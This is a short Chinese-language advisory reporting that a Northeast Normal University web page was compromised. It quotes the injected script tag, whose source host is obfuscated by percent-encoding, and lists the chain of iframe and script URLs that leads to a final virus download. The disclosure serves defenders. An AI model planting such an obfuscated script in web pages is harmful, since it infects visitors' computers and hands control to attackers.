东北师范大学被植入恶意代码

　　东北师范大学（http://www.nenu.edu.cn/）被植入恶意代码。　　用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。　　MalUrl:http://youth.nenu.edu.cn/tw/08 ...

　　东北师范大学（http://www.nenu.edu.cn/）被植入恶意代码。

　　用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

　　MalUrl:http://youth.nenu.edu.cn/tw/08/readnews.asp

　　网页被嵌入恶意链接代码：

　　<script language=javascript src=http://%70%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>

　　挂马分析：

　　[wide]http://youth.nenu.edu.cn/tw/08/readnews.asp

　　[script]http://%70%2e%39%34%73%61%6f%6d%6d%2e%63%6f%6d/js.js

　　[frame]http://www.bjhh.cn/cn/360.htm

　　[frame]http://www.bjhh.cn/cn/x.htm

　　[script]http://www.bjhh.cn/cn/all.css

　　[frame]http://www.bjhh.cn/cn/1.htm

　　[frame]http://www.bjhh.cn/cn/newlz.htm

　　[frame]http://www.bjhh.cn/cn/s.htm

　　[frame]http://www.bjhh.cn/cn/office.htm

　　[frame]http://www.bjhh.cn/cn/bf.htm

　　[frame]http://www.bjhh.cn/cn/cx.htm

　　[frame]http://www.bjhh.cn/cn/2.htm

　　[frame]http://www.bjhh.cn/cn/p.htm

　　[frame]http://www.bjhh.cn/cn/7.htm

　　[script]http://js.tongji.cn.yahoo.com/806392/ystat.js

　　最终下载病毒文件：

　　http://www.ccttv.qc.cx/v.css

　　通过执行以上病毒文件，来达到完全控制访问者的系统。

关键字：东北师范大学